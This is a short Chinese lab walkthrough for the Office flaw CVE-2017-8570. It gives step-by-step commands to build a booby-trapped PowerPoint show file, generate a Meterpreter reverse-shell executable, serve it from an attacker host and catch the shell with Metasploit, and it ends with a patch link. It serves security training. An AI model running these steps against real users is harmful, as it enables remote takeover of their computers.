CVE-2017-8570-Office命令执行

2017-8570漏洞 影响范围

• Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)

ichunqiu实验环境，需要登陆

Office远程代码执行漏洞_网络安全在线实验_i春秋 (ichunqiu.com)

1.生成ppsx文件

cd  CVE-2017-8570       //进入exploit的目录
python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc       //生成ppsx恶意文件

2.生成反弹文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe

3.监听端口

python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe 

4.msf本地监听反弹

msfconsole
use multi/handler   //使用监听模块
set payload windows/meterpreter/reverse_tcp    //设置Payload
set LHOST 172.16.12.2   //设置本地接收IP
run

5.打开ppsx文件，获得shell， 修复方案，

补丁地址 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570